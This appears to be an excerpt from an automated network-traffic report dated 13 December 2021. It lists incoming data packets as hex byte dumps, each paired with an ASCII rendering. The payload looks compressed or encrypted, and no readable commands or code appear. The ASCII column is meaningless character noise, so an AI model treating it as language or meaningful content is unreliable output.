                                                                                              2021-12-13 23:57:12 UTC1749INData Raw: 95 be 8d ef 95 7c 38 a2 65 c5 e5 d0 98 26 26 47 18 97 9f fb 32 a4 4d 00 4f 48 13 f3 90 7e 05 d2 6f 8f 32 2e c7 20 ef 16 3c 91 31 cb 9d b8 6e 42 bc 8c 94 b8 f8 44 70 1f a3 ab 3c c9 28 13 8f 50 40 03 0f 02 1b 32 70 7a 06 b0 3e ca d0 c1 14 ab 1e a2 38 8b 7e 6e 98 77 2c 64 d6 18 e1 79 3a 09 27 28 94 81 5e 3a 05 2a c1 73 92 92 f1 3e de b8 be f8 2a df f4 fb d6 18 0e 9e 92 4e c9 12 c7 a9 33 58 22 9d ea 16 55 43 0c b7 83 43 1c e1 48 0e 31 ec fe c3 10 c3 ed 4f 86 18 6e 4b 87 75 b8 f5 87 4c 40 7b 65 c4 01 68 bb 86 73 02 6d 23 4d 9d 3d 18 61 2a 86 78 7c 7b d4 86 c7 5d c3 0f 82 c7 bb 69 82 b3 c2 ac a5 c1 56 12 85 6c 30 6b 63 8e 8c 65 87 59 0b 33 c9 bb c7 34 74 a8 11 0c c6 8e 08 5b 2c 5c af 0d 13 1a fe 13 93 db 4c 0a 47 88 ec 1a d1 91 52 0a ab 13 56 64 a4 57 0a 92 13
                                                                                              Data Ascii: |8e&&G2MOH~o2. <1nBDp<(P@2pz>8~nw,dy:'(^:*s>*N3X"UCCH1OnKuL@{ehsm#M=a*x|{]iVl0kceY34t[,\LGRVdW
                                                                                              2021-12-13 23:57:12 UTC1750INData Raw: fb d6 1e 38 60 6c 4c b5 c7 78 7f ef c7 ed 90 f0 82 10 0d 5e 48 99 7d 42 dc 7a 04 3e 5d 97 e3 b1 6f 3d 12 bc 26 8a f9 8e 76 be 19 12 7c f3 e8 35 1a b4 fa 2f 4b 3d 2c e8 82 f0 2f b3 4e 90 d8 6d d5 f9 6b f0 32 07 a2 6f 37 73 63 a2 e8 2a 03 ef 48 60 10 63 fe fd 3b 4f 40 d0 b5 ef f9 09 0a ff 6e 28 72 18 4a 0b d7 2a 7a 45 e4 07 e8 1b ba b6 84 ed 8b 39 61 70 c7 9f 45 61 ac a0 57 1c 9c ed df 0d ed b6 6d ef a9 e5 84 5d 1d 50 30 a8 2a d8 09 05 3f 28 50 c5 71 38 8f e9 f2 13 5a 69 70 fd b3 2b 68 38 96 be 7c 08 ae 4f c2 b1 40 ac c1 e6 33 de 68 21 4e 14 45 d4 55 d4 05 f1 e1 20 ee e5 2b 23 55 9c b0 01 50 3e 8d 51 16 75 35 b7 7b a3 31 b7 3b ba 0e c3 dc 81 e0 5b d0 d7 60 5c a8 ef 5f d0 57 ff 35 ea 20 b1 e5 72 5b 6c 76 74 92 94 20 d1 8d 1f c5 f8 72 55 00 b3 25 60 b0 3f 5a
                                                                                              Data Ascii: 8`lLx^H}Bz>]o=&v|5/K=,/Nmk2o7sc*H`c;O@n(rJ*zE9apEaWm]P0*?(Pq8Zip+h8|O@3h!NEU +#UP>Qu5{1;[`\_W5 r[lvt rU%`?Z
                                                                                              2021-12-13 23:57:12 UTC1766INData Raw: 49 6b 1c c0 0d 02 1e cd e1 c8 80 56 03 c0 c3 05 1c b3 33 bd e2 89 8b f0 0c f3 7b c6 d3 1a 12 b7 35 a9 c7 32 70 e2 e2 89 c6 bd df 53 63 e1 6f 45 76 0c 01 63 fd 9e 38 7a 89 f1 7b e2 e1 c5 b4 2d 2f ba c2 93 40 a0 28 bf 67 18 bc 94 96 c4 84 2d 8e 84 97 da cc 98 70 8a 92 19 93 89 93 16 7b 26 7c 55 7a 08 51 66 ac b6 2e 85 99 c8 0b 31 cc bf 70 14 df e9 3d 16 85 63 5e 67 81 df ee c4 c0 ec cc b1 a2 0a 39 d0 2d 37 d8 01 5e e0 f7 64 8b 27 4c 65 3b 71 5b a8 59 3c ad 44 47 82 e4 ed 47 99 c5 51 f6 9e d6 01 da d7 e9 a2 78 0e 13 09 26 89 e7 54 79 1f a8 ec 55 1f 81 ca de cc 70 2a 4e 64 8d c0 19 cb dc 96 80 ed a3 53 f6 18 fd 93 81 f9 51 fe c9 78 ce ad ac 64 98 e4 bd 9c 5e e2 a5 e5 17 d1 4b 9c b4 3c 56 9c 3f 31 22 1b de f5 64 e3 27 b4 80 d6 7e c1 df 9a 8e b6 b0 a5 98 b6 c6
                                                                                              Data Ascii: IkV3{52pScoEvc8z{-/@(g-p{&|UzQf.1p=c^g9-7^d'Le;q[Y<DGGQx&TyUp*NdSQxd^K<V?1"d'~
                                                                                              2021-12-13 23:57:12 UTC1767INData Raw: 35 30 cd cf bd 7a 94 c5 19 0d ec 78 fb 45 da be 3d 03 9a 51 9b 74 ad c4 f2 37 d5 2b 42 34 14 fe a8 95 13 1a 46 2d 1d 00 42 33 00 b6 74 dc 77 81 50 3a 16 14 ab 51 51 f2 23 75 04 36 61 13 27 60 cc 4e 6c 2d 54 b9 9b 9c 8d 24 fa 83 e7 56 d7 bd ac 9b 5b f5 b8 4d ec 8d 27 ca 9e a4 bd f1 66 02 1c da 0d 80 da c3 08 88 af 75 27 8c 28 a8 73 5f 8a bb da dd 43 e9 ef 70 fa 9b 28 49 b5 ee 2b 24 3a fd 8c 7f a2 6a dd d1 61 f8 12 8b 7f e2 f0 8f 55 76 8b 13 10 a3 51 a2 f0 39 db c5 2f ff c9 9c ed 86 97 b5 39 1b ee 6f e1 09 ab 28 21 4b a7 cd 1f 66 96 ff 1f da 40 c2 66 d2 33 06 e2 f5 f4 b0 a8 fb f7 ab 13 bc 72 87 b6 39 ff b5 97 d4 3d 30 b4 4e 61 66 9f 63 79 1d f1 ec d9 5d e4 d6 e1 03 3a 25 5a 24 11 8f 6b 98 a5 1f 19 cd 1c 56 78 ef 13 4e 7e 4d cb 4a 62 25 ef 60 1c 9b bd fd 0b
                                                                                              Data Ascii: 50zxE=Qt7+B4F-B3twP:QQ#u6a'`Nl-T$V[M'fu'(s_Cp(I+$:jaUvQ9/9o(!Kf@f3r9=0Nafcy]:%Z$kVxN~MJb%`
                                                                                              2021-12-13 23:57:12 UTC1783INData Raw: 54 e8 cd 67 c7 d4 8a f8 fd 04 56 c4 31 a8 88 46 be 5f 1e ef 61 43 87 8f 41 ad 6a 6b 32 6f 55 f1 45 7a 0e 5e 88 77 eb e0 9d ab 91 c8 49 9a 21 be 3c 37 a4 d9 e5 89 2d fc bc dd a9 5f 81 86 67 ff e9 ac ea 01 f4 a1 40 da bc 0e e1 df 35 e0 e1 e1 f1 b9 dc 6b eb a5 57 72 de 5c 60 ff 13 c9 d2 7a 41 4b 0e 1a 6d 5c 6d 78 9a 0f c8 bb 0d c8 63 57 03 2b 59 25 fc 11 57 b0 69 78 87 16 79 f9 cd 6b 45 61 41 8c f9 aa 45 65 cc 21 ce 18 eb 2b f5 e4 9e 33 a8 85 fe 33 89 53 f3 40 56 50 0b 1d 57 84 b5 79 88 d7 e6 e2 f1 3c ce 6d 59 01 e1 c6 ed 39 78 b4 51 ac fa d1 04 71 25 8e 65 c5 53 cb 4f 99 ca 4b 74 fe 76 af 1b 40 6b 19 4b a6 ca a7 fd 37 c5 c8 11 20 a1 fc 63 a2 51 84 3d f5 13 8e 23 a6 fb af c5 84 24 af 2e fe 10 d5 81 92 e1 62 e9 36 a3 c3 77 2d 0f e8 c5 03 12 c5 5a 2f 04 24 f1
                                                                                              Data Ascii: TgV1F_aCAjk2oUEz^wI!<7-_g@5kWr\`zAKm\mxcW+Y%WixykEaAEe!+33S@VPWy<mY9xQq%eSOKtv@kK7 cQ=#$.b6w-Z/$
                                                                                              2021-12-13 23:57:12 UTC1784INData Raw: e8 f0 5e 08 f9 92 19 cb 31 aa c0 5f d2 1b be aa ce e8 5a a5 ba 7e f9 a7 34 fc a3 1b 1a 7e af a3 4c 2f 15 34 b4 f2 cf e1 dd d2 60 14 34 5c a8 d1 80 5b e6 ad dd d1 80 b2 4d d5 82 2f a3 dd 2c 42 f9 ad 24 68 a8 b4 9b 7a 19 49 bb 35 4a 29 29 d2 55 f8 37 cc 37 4c 5e 43 28 0e 78 07 9b b6 4d 1c 55 b1 06 31 c8 a5 08 23 94 ad 91 b5 a5 84 54 9c 63 2c 1d 9d 41 eb b5 31 a0 db 18 2d 7b 4d db 06 ed b9 c3 8b 2b 2e ae 13 e2 6a b6 43 7b 8e e3 3a 8d 64 52 f5 a5 0e 3a 87 4b 96 64 bc 2f 87 86 d9 e3 c3 48 ac a0 8e cc 6e ea e0 52 90 5f aa d2 3a 0e 7b 4b e2 22 6f e0 ce 57 36 3a 28 86 26 61 2e 6a e9 4c e3 f7 aa ae 8d b3 4b a3 20 09 29 33 9d ec f9 5d 47 14 16 95 41 1b 88 03 f7 ac 34 08 f9 de 10 aa ba dd 7e a7 ce 94 4d 17 71 ec 89 90 68 85 91 5f c4 f1 f4 37 8a d2 f2 02 d9 fa 3b c4
                                                                                              Data Ascii: ^1_Z~4~L/4`4\[M/,B$hzI5J))U77L^C(xMU1#Tc,A1-{M+.jC{:dR:Kd/HnR_:{K"oW6:(&a.jLK )3]GA4~Mqh_7;
                                                                                              2021-12-13 23:57:12 UTC1800INData Raw: 37 55 e8 cb 5c 67 4d 17 ed c0 49 b8 92 08 bb 9b 5a 93 45 c8 1d 33 71 de 2e b4 2e 97 90 af 29 14 c2 e5 4b 1a 7d 71 39 94 2e 28 73 08 bd 3a a5 8b 0c 4c a1 dc f8 ec c6 4e f5 96 46 b2 d5 4c 52 22 5d 68 70 9c 1f 69 d4 92 5c 62 be 1e dc 96 f1 3e fd 74 aa cb 2c 31 46 aa b2 81 f7 10 3e af 71 d3 77 8a 90 71 a9 9a be 91 46 3d cb 46 ad dd 41 4f 9b e8 f5 56 aa 31 55 8f b6 08 7d 23 45 8c d8 66 a1 2f a6 8b 19 46 ba d0 b5 53 c4 2c 3c 4b cc 89 52 85 9c e5 e5 b1 0a 8b 40 d7 79 45 92 18 9f d3 88 22 1b f5 48 ab d0 c2 b8 e6 91 26 6c 1b 5c 6e a5 50 59 f9 b8 eb 22 ce 67 91 64 e2 e3 48 92 d0 bd 1d 62 f4 e6 73 02 9b 68 95 29 a2 cc a9 42 57 e6 bd 9f 4b b9 64 c2 e5 a4 d6 90 25 fa 92 5a 4e 3e a6 d8 49 ca 70 69 e1 14 ba 12 97 f0 56 51 a3 a9 9a 25 86 cf 81 53 c4 fc 8b 73 94 d3 ed 14
                                                                                              Data Ascii: 7U\gMIZE3q..)K}q9.(s:LNFLR"]hpi\b>t,1F>qwqF=FAOV1U}#Ef/FS,<KR@yE"H&l\nPY"gdHbsh)BWKd%ZN>IpiVQ%Ss
                                                                                              2021-12-13 23:57:12 UTC1801INData Raw: e4 c3 72 80 bd 7f 6e 8b 52 65 9c 5c 42 2e c8 33 df d8 a7 54 c5 d2 47 27 b3 c0 87 5c d6 4e 0e 60 d9 bf 21 5a eb 4d 6c fa ed e8 2c 98 ad ed f5 a1 c2 26 f0 f7 0a 7c 77 dc ae a2 84 b8 8b 20 6e 51 26 9e 45 71 02 21 ec b6 7f d2 59 14 f6 d6 8e 7d 8a a7 32 af ad ca 8b d0 3c 82 b6 b1 67 11 5a 24 b1 e7 57 e8 fc 54 5a 20 46 a5 ab 8d bb 92 7c 77 0b df c8 59 f6 ac 76 b0 44 bf 86 e6 b2 a5 39 ed e9 c9 b6 74 bb 3d 2b 25 d5 e6 72 59 d2 52 ed 69 69 e9 2e 77 aa 3d dd 65 0d f2 c1 f8 35 f9 75 b2 5a 5d 49 a9 49 6e 7b b2 db 99 66 36 a7 3a 6d 8e 2c bb d5 92 9e e6 48 4f c3 37 bb db 92 94 e2 00 6c 69 76 47 52 52 aa 39 29 d9 ec 4c 32 bb 2d 59 2e 9b 39 39 d9 e5 b4 bb 93 5d 96 54 ab dd 99 62 b7 a5 d8 2d 29 e9 e9 f6 14 8b cb 6c 31 67 a5 bb 93 92 2d ce d4 b4 24 bb 2d cd e5 b0 26 39 ed
                                                                                              Data Ascii: rnRe\B.3TG'\N`!ZMl,&|w nQ&Eq!Y}2<gZ$WTZ F|wYvD9t=+%rYRii.w=e5uZ]IIn{f6:m,HO7livGRR9)L2-Y.99]Tb-)l1g-$-&9
                                                                                              2021-12-13 23:57:12 UTC1817INData Raw: ca 8b 8a bd ea b7 23 ee bd 84 9b 1e 89 fb f9 94 e8 f2 1e b8 12 cb 3b 8d ca 8b 17 26 f8 23 f8 29 09 eb a5 d0 8c c1 36 73 7b 7d f9 28 dc 5e 47 a7 f4 7e 2e e3 bf 3c fc 31 38 5b 69 37 3e ed b5 12 c6 4f b6 f5 c0 c0 8a cf e7 55 0d 95 5f c9 2e ca 5c 8f e3 81 6d 61 d5 f8 ca f7 47 56 5e 8c 7b 02 14 1a 3c 25 38 33 ef 8d c3 b7 c5 55 bc 89 3c da c4 bd c1 a6 37 be 06 d7 1b 6c e2 1b 55 30 ef 8d a0 48 27 04 33 e6 1a de c1 ec ee 89 07 82 ef bd 71 04 5c 6f b1 89 a1 aa e9 9d 71 3a af d2 3b e2 b2 3b ab b2 db 8d 17 fb 9e 1d ca 4f 2b e8 09 17 d3 d3 2e c1 7d 13 81 79 0a ee 9d 48 52 1c f3 4d bf 23 e9 78 bf 60 06 30 dd 86 4f 30 6d 6e c0 b2 e6 11 97 c7 73 8e e0 cd 29 f1 06 75 47 00 79 b0 20 10 e1 57 81 77 71 7c 20 2b 8b bf 7c 38 84 e2 20 93 e8 cf 88 e8 d8 61 28 49 ae e3 fc 55 14
                                                                                              Data Ascii: #;&#)6s{}(^G~.<18[i7>OU_.\maGV^{<%83U<7lU0H'3q\oq:;;O+.}yHRM#x`0O0mns)uGy Wwq| +|8 a(IU
                                                                                              2021-12-13 23:57:12 UTC1818INData Raw: c3 3f 3c 1a c6 c2 dd b7 7e 7f 38 26 ec 8f 78 f1 81 c7 7f 43 c5 bf 89 62 44 ef 14 ad 3a d3 2f 87 cd 56 2a 33 b6 f9 b3 f8 97 90 c9 29 57 97 e2 9d 18 23 ed 0b f5 3e a0 6c 38 86 e8 b1 d9 c8 45 89 f6 16 64 32 ce a4 46 9e 23 1d 5a 6d 9c c6 e4 0b 68 c0 ab 26 25 36 a7 76 e0 58 db 12 40 ad 39 93 a0 e6 f8 7b a3 3b 0c ad 39 dc ed a1 c7 d9 f3 f8 27 60 29 bd 32 8b 67 f6 53 ce 7f 5d 79 8c 9c cb c7 cc b9 c7 c8 f9 a1 64 33 f1 4f be a2 db 58 eb 6f 8e 3c 6b 34 3a 88 bd ad 89 af 9f 18 21 99 4d 9e 24 be 80 69 13 45 17 dc 3a 0e 57 d3 b1 e3 14 ca 4a 55 9f d3 e7 f5 ca 7e c5 eb 76 fb ec 3e d9 09 6b 6b 49 b7 d3 38 51 4c 3a 7a 8a 73 f9 d9 df 84 70 4d 35 63 16 9d 92 48 0f 96 0a f5 f7 b3 3e 0d 85 67 1b f7 e8 12 a3 74 d5 fc 06 55 6a 60 9f 3a f3 be 81 6d 86 be fa c9 f7 a1 fe ef 51 96
                                                                                              Data Ascii: ?<~8&xCbD:/V*3)W#>l8Ed2F#Zmh&%6vX@9{;9'`)2gS]yd3OXo<k4:!M$iE:WJU~v>kkI8QL:zspM5cH>gtUj`:mQ
                                                                                              2021-12-13 23:57:12 UTC1834INData Raw: 93 b9 ed 01 f7 c1 6d 9f f3 de b2 3d 07 7b 04 b7 9a c3 a2 d7 03 d4 cb c5 72 24 de c9 f9 48 fc 4c a7 23 f1 9e 96 9a ef 0e 0e 8a d5 dd 4d 83 c9 cd af fc d0 b2 f7 25 2a 1e 1c b5 5a 34 c8 8a b5 24 d1 5a 98 c6 ff c8 dd 85 f4 a6 b6 f7 25 9a 3b 68 b6 ba 67 d9 b9 2f 62 ee 59 bc fb 7a 24 4e 7b 5f a2 b9 83 92 95 bc 3b b7 f3 f6 0f 2d 9b 6f dd 48 af b0 aa a0 36 7e 05 69 9c e8 2e ea 8b 0c f9 07 5d 98 7e 90 24 4c f2 87 24 65 d2 52 48 9e 4c 0a 80 e4 cd a4 60 ab 2e d0 aa 93 59 75 e1 56 9d dc aa 8b b1 ea 92 ac 3a 85 55 a7 b4 ea 52 ac ba 2c ab 2e c3 aa cb b1 ea b2 ad 3a 15 24 1f 26 69 20 f9 32 a9 18 52 20 93 74 90 82 99 64 80 14 ce 24 a3 55 57 61 d5 55 5a 75 d5 56 dd 1e ab ae d6 aa ab b3 ea ea ad ba 06 ab ae d1 aa 6b 82 24 63 52 2b a4 18 48 6c 5f 6b 5f c9 df cb 3a 84 b4 73
                                                                                              Data Ascii: m={r$HL#M%*Z4$Z%;hg/bYz$N{_;-oH6~i.]~$L$eRHL`.YuV:UR,.:$&i 2R td$UWaUZuVk$cR+Hl_k_:s
                                                                                              2021-12-13 23:57:12 UTC1835INData Raw: 58 f7 69 e7 0e a7 27 46 57 1a d9 73 2c 7b 9f a1 d3 15 5f 66 7b 21 30 b3 d6 0b e8 ab 47 d6 2f c3 96 9a cc 49 d3 04 54 dc 66 bc 5d 16 39 99 c6 20 0b 13 d8 ad 4a 27 5c fb 6d 6c 02 9b a9 fe 40 36 ea e1 22 79 c7 71 9b e3 38 75 ac 12 1c a9 fe 80 81 3a ce 4a b0 9b b7 95 65 fc eb 8e 6f 2c 3f 63 c5 91 f4 75 67 fd 94 77 76 fa 05 5b 22 89 25 29 b8 17 25 d8 e9 71 23 21 19 24 8d 64 32 2d bd 37 79 de c2 6e 31 8f a1 7d f1 1d 69 f3 8f 78 37 f1 86 be b9 ae 9f de 11 73 9e ce 20 cd ba 41 2a 66 50 d1 ef 38 15 83 a9 68 60 ef 06 95 54 ac fc 1b 15 ab a9 38 f6 16 15 f7 50 71 e4 08 15 eb a9 e8 f9 1e 15 7d 9e 81 d8 c0 1c fc a9 38 3a 40 c5 26 2a d6 f7 52 b1 9d 8a 01 27 a8 18 f8 2c c4 f0 3e 76 57 a6 a2 fc 5d 2a 9a a8 38 c4 5e 33 7a a8 38 c2 1a 56 b4 43 94 32 5f 25 15 93 58 cf 06 a8
                                                                                              Data Ascii: Xi'FWs,{_f{!0G/ITf]9 J'\ml@6"yq8u:Jeo,?cugwv["%)%q#!$d2-7yn1}ix7s A*fP8h`T8Pq}8:@&*R',>vW]*8^3z8VC2_%X
                                                                                              2021-12-13 23:57:12 UTC1851INData Raw: fd 9f e0 dc 01 eb 5e 7a 6b 1c 58 9b cc 17 ea 55 f5 bc 3e 43 47 d3 62 82 b3 fa 82 9e 49 3d 7a 6c a9 50 53 ae d1 e8 de 2b 7d 9e 56 b7 d2 33 da 26 8e 3f 7a 07 b6 1a d9 ab 56 35 50 e7 62 c8 89 3e 5b af 7d ee 7b 74 f7 e0 7e 39 b1 5b 03 be be 9a 16 98 32 bd eb 9c 2d 03 4a 82 54 f9 1b 42 b5 2d 27 85 04 7d ec 10 3c 76 db 83 b9 f3 4a 56 86 5b 9e 34 8f 68 cf 51 58 d4 dd f9 f6 c2 bd c1 91 61 1b ba 8e 9a 77 23 89 31 5f 70 e3 ca 82 d4 be d9 3e cb c7 84 fb 96 d6 1b f8 bf 5e 57 ef e7 b3 2c c3 7b c6 bb d0 d9 c4 64 3d cf 41 06 35 5e 9c 88 63 ce 86 ca be 2e ee 87 b5 9d 26 5d 78 ed 78 bf 70 bf db f3 b3 ae ae 67 c8 1e ee b1 5e 65 1e 6a 79 85 66 1d 76 29 8f 9b d8 cd da 3c 6c 6e dc f8 1f 2e a5 96 79 72 aa 13 d7 9f b2 b3 d8 f7 24 61 42 c2 d6 4b 26 c7 aa 59 a6 5f 26 1a 8d bd a0
                                                                                              Data Ascii: ^zkXU>CGbI=zlPS+}V3&?zV5Pb>[}{t~9[2-JTB-'}<vJV[4hQXaw#1_p>^W,{d=A5^c.&]xxpg^ejyfv)<ln.yr$aBK&Y_&
                                                                                              2021-12-13 23:57:12 UTC1852INData Raw: 9a 71 6d 4d c7 0c 8f 61 ad 0a b0 e5 69 5e 06 56 fd e4 67 bd db fc ac 7a fa d2 e5 9b 5f 8e b8 b3 7c 99 5b 7a d9 d0 27 76 96 6b 6f 1b f6 1a 10 ba 4c e9 c5 9b e7 a1 d3 26 2b 14 bd 37 f2 3c 3f a9 6e 57 9d 76 f5 a5 c4 cd 66 5a ba 3d ec 2c 6d 77 3e fb e2 3f 2e 62 03 e7 f3 d5 45 07 8c 1e 74 cc f9 e1 3b b1 20 71 90 f6 29 f5 d8 cb 1d e3 13 93 22 b4 7a 76 32 15 9c 59 a8 66 4c ac 5f 5b ab f4 b5 d2 ec e0 88 69 ed b6 4d 33 3c a8 7e 72 5d 17 bd 7b 5f 77 ad 9c 7d 3b a4 5d 9b 83 37 8e 94 b3 23 ce 45 3b 5e 64 dd 0d 48 9a 79 aa 83 6a c5 f4 cc e4 da e1 4f 95 2d 96 be ca bd 53 16 19 ee a5 d8 2f 6f 81 b7 59 e8 c5 dd 6d 14 f2 ae 7a 1e 9f d3 fb 2a c3 c9 22 29 b3 f8 73 82 ff 98 75 d4 bd 1f e1 56 ee 1f 54 06 3f 9a 3a a1 e7 69 c5 5e 46 cc 93 57 aa 52 f7 ee 59 21 af da 39 f5 f1 e2
                                                                                              Data Ascii: qmMai^Vgz_|[z'vkoL&+7<?nWvfZ=,mw>?.bEt; q)"zv2YfL_[iM3<~r]{_w};]7#E;^dHyjO-S/oYmz*")suVT?:i^FWRY!9
                                                                                              2021-12-13 23:57:12 UTC1868INData Raw: f8 2b bb ca a1 6f f3 0a d1 6d 03 7a 71 99 7e 90 04 87 20 9a 25 00 47 ca 21 7f 71 22 72 86 14 5a 0c 86 79 13 50 2c e2 5f 96 2f 19 1e 19 3d 0a 49 21 fb 85 bc 15 47 34 46 4a 5c 0b 76 19 a8 13 f4 b3 51 c8 05 a0 15 3c e4 5a 59 e2 d8 97 82 11 71 98 90 03 12 02 96 d8 05 a0 5c 04 25 fe 84 90 cb 11 3f ab 28 a0 e8 75 2b 18 bc a0 c5 f3 88 e2 2f e4 64 51 b6 03 8c 24 39 ff ea b0 1b 9f bc 01 6e 83 c7 17 12 ff 4c be 44 ee 5d 80 9e 41 10 72 48 f6 af ae 88 7c 07 32 88 a0 59 2c 2e 53 a4 b5 68 a9 96 85 b2 41 b0 f8 2c a4 ee 02 52 f4 1c 07 28 1c 1b 0e d2 3e 8d 01 6c 07 63 88 ee d9 12 4c 5c 76 f3 ff 8f 16 61 c6 56 63 6d 8c 4d c7 4e c3 0c e8 37 88 35 db 85 6d 2c d8 2b d8 c7 0d 73 0a 0a f6 9a 13 8c 39 f9 38 cf f5 c5 c2 dc 9c 82 30 17 7f 5f 5f 37 bf 60 2c 38 c8 c9 c5 1b e3 bb 62
                                                                                              Data Ascii: +omzq~ %G!q"rZyP,_/=I!G4FJ\vQ<ZYq\%?(u+/dQ$9nLD]ArH|2Y,.ShA,R(>lcL\vaVcmMN75m,+s980__7`,8b
                                                                                              2021-12-13 23:57:12 UTC1869INData Raw: df 68 b1 99 2b fe 77 ba e1 e3 34 27 58 cd 19 86 ef 0d 1e d3 6b 8e 8b bf 5f b0 97 df 5c af e0 30 35 77 ff b9 7e ae 7d d4 9c 9c fd 21 e0 f1 f3 68 51 0b 4d 6f 6a 6d da a2 5d 5b b0 bf 3f 44 3f 7e 61 6a 2e 9e 4e 7e 7e 6e 3e 73 1a 5a 72 09 72 43 8c 17 b9 36 14 19 a8 85 3a 85 a8 79 42 fb 6e 41 d0 85 20 35 3f 7f 3f 1d 3f ff 20 5f a8 30 1f 42 26 77 1f 7f 27 ba 3b c8 bd 4b c6 12 74 b8 40 fb fc 81 e8 ea e2 f8 00 fe b7 fe 3f ec 9d 0f 78 5c 57 75 e0 6f 1c 11 84 31 59 c5 b8 41 0d 5e aa 18 13 04 35 ae 32 91 c2 34 88 44 23 8d 6c 29 c8 f6 c4 1a 5b 22 eb c6 1a 69 9e 3c 13 8f 66 26 33 4f d2 28 98 20 c0 4d 45 10 41 04 27 88 e0 06 11 dc 20 82 97 15 a9 36 eb 4d bd 41 04 03 6a f0 a6 82 7a 59 95 75 83 92 7a a9 4a 4d 10 a9 09 22 35 a1 bf f3 ee 7d 33 6f 24 a5 ed 57 3e d8 76 eb f9
                                                                                              Data Ascii: h+w4'Xk_\05w~}!hQMojm][?D?~aj.N~~n>sZrrC6:yBnA 5??? _0B&w';Kt@?x\Wuo1YA^524D#l)["i<f&3O( MEA' 6MAjzYuzJM"5}3o$W>v
                                                                                              2021-12-13 23:57:12 UTC1885INData Raw: c8 2e 65 57 b2 6b d9 8d ec 56 76 27 68 d7 41 76 b0 3d d1 9e 09 55 be d2 de 68 ef b4 0f da 27 ed 8b f6 4d fb a1 fd d2 fe 60 fb 9c 20 27 96 c8 c8 67 72 24 20 6c 2e a7 10 f8 46 25 a8 8e 46 40 da 4e d0 ce 83 80 b7 13 c1 3f 16 3a 2b 9d 8d 40 de 83 ce 49 e7 a2 73 53 e4 74 3e 38 3e 37 c8 8d 05 1c 4e e5 66 12 99 9d 5c 6e 21 b7 14 22 57 2d b7 11 54 7d 27 b7 97 3b 08 51 6c a2 3b d3 5d 88 58 b6 d1 dd 09 96 72 12 5c f6 a6 fb d0 7d 19 c2 55 82 c3 f9 ba 79 e5 65 29 48 8a 25 25 92 52 49 99 24 49 d2 a4 5c 52 21 a9 94 54 09 fa a1 89 d4 49 1a 0e cf 98 21 2d 95 56 49 db a5 3d d2 49 e9 1c fc e2 81 f4 56 fa 28 45 94 a3 ca 89 e4 e4 f0 8c 9c b2 25 e7 96 4b 40 55 d4 92 eb c3 2f 3a ca fd e4 c1 f2 78 b0 98 85 f2 32 78 c5 0e f9 28 98 cc 75 f9 0e 38 ea 3b f8 44 24 12 8f 24 26 19 48
                                                                                              Data Ascii: .eWkVv'hAv=Uh'M` 'gr$ l.F%F@N?:+@IsSt>8>7Nf\n!"W-T}';Ql;]Xr\}Uye)H%%RI$I\R!TI!-VI=IV(E%K@U/:x2x(u8;D$$&H
                                                                                              2021-12-13 23:57:12 UTC1886INData Raw: ba 85 b0 bb b3 d6 7b 70 90 44 a1 08 9b 4f d8 55 29 61 59 d5 84 6d 35 12 d6 d5 ce 1e 6b af b0 d7 d8 67 ed bb f6 53 a8 b8 2f 40 d7 40 e0 6b 34 20 6c 3c 60 6c 32 a0 6c 3a d8 5a 36 20 6d 25 a7 b3 d3 dd 99 ea 2c 75 d6 c2 da f6 02 55 8f 02 57 cf 02 59 af 02 5b ef 02 5d 9f 02 5f df 02 61 63 01 5b d3 b9 f9 fc b6 f7 3b cb 1b 0b 7c 9d 0a 84 dd e9 5e 72 af 85 d4 4b 63 05 f8 1e 82 73 44 93 e2 49 c9 42 ab a4 14 a8 6a 01 57 f3 01 59 8b 01 5b cb 01 5d 3b 49 63 a4 09 d2 46 e9 90 74 12 96 f8 50 7a 09 65 f1 45 f2 c9 81 72 90 1c 4d 8e 05 5d 98 48 4e 06 6d 98 4e ce 24 67 93 73 89 6a 69 2b b9 97 dc 4f 1e 04 7d 38 51 9e 2a cf 84 f2 5f 28 2f 85 52 5c 2b 6f 94 b7 ca 3b e5 bd f2 41 f9 28 ac f6 95 1c 8d 64 24 1a 29 46 4a 81 5b f7 82 4e 0c 0e a3 8e b6 97 1c 24 47 c9 5d f2 1e 5c 23
                                                                                              Data Ascii: {pDOU)aYm5kgS/@@k4 l<`l2l:Z6 m%,uUWY[]_ac[;|^rKcsDIBjWY[];IcFtPzeErM]HNmN$gsji+O}8Q*_(/R\+o;A(d$)FJ[N$G]\#
                                                                                              2021-12-13 23:57:12 UTC1902INData Raw: b7 87 bd 8c 17 dd 1e 07 b4 73 da 1d ed 9d e6 5d 45 49 01 14 32 f5 d2 7a 13 bd ab c8 22 cc d0 97 89 fc c1 65 fd 21 70 e7 9b 1e cb c8 00 a4 c9 0b 74 e9 62 f4 30 bc 3d 57 6b 8c cd c6 2e e8 85 1b c6 1d e3 81 b8 8c e5 59 51 6e 33 bf 59 5b e4 a9 16 8a e9 90 83 ff 98 0c f9 b9 b7 36 9a 65 8b 8b 27 f5 44 25 62 93 b5 c7 7a 18 7a cf 27 ec 6e d9 62 fe 2e a3 39 f6 5a 71 c9 e7 96 fd c2 fe cb 8e 80 b8 e0 38 79 60 43 f3 c0 80 8e 3a 6f 9d 4c a1 fb 17 b6 ba 87 dd f3 de 6d e5 5c 11 45 7e 33 8e 94 08 1a b1 1e 5e ff a8 bf 3f f5 cf 53 9c 4c 2e 20 57 05 77 9e 2c af 90 b7 c9 27 e4 eb f2 7d f9 83 ec 75 a1 96 25 d5 49 6d d2 eb a7 2a fd ef ae 3a fc 3c 03 f2 9a 84 57 92 80 07 15 54 4a 8a 7e 90 86 4a 4b 31 01 32 50 19 a9 4c 50 66 28 0b 60 3d 1b 94 1d ca 01 e5 04 6c e8 86 f2 00 11 fa
                                                                                              Data Ascii: s]EI2z"e!ptb0=Wk.YQn3Y[6e'D%bzz'nb.9Zq8y`C:oLm\E~3^?SL. Ww,'}u%Im*:<WTJ~JK12PLPf(`=l
